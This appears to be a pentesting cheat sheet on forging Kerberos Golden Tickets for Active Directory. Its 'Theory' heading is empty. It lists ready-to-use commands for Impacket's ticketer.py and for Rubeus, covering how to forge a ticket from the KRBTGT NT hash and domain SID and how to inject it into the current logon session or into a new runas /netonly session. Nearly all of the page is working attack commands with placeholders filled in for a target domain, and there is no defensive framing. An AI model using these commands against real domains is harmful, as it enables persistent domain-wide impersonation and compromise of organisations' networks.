Theory
Abuse - UNIX-like
Impacket’s Ticketer.py
Ticketer.py
ticketer.py -nthash '<KRBTGT_NTHASH>' -domain '<DOMAIN>' -domain-sid '<DOMAIN_SID>' '<USER>'
Abuse - Windows
Rubeus
Rubeus.exe
Injecting the Golden Ticket into the current Logon Session
.\Rubeus.exe golden /rc4:<NT_HASH> /domain:<DOMAIN> /sid:<DOMAIN_SID> /user:<USER> /ptt
Injecting the Golden Ticket into a new Logon Session
- Creating a new Logon Session (Type 9 - NewCredentials) with dummy credentials
runas.exe /netonly /user:test cmd.exe # Or powershell.exe
- Forging the Golden Ticket
.\Rubeus.exe golden /rc4:<NT_HASH> /domain:<DOMAIN> /sid:<DOMAIN_SID> /user:<USER> /nowrap
- Injecting the Golden Ticket into the new Logon Session
.\Rubeus.exe ptt /ticket:<BASE64_BLOB>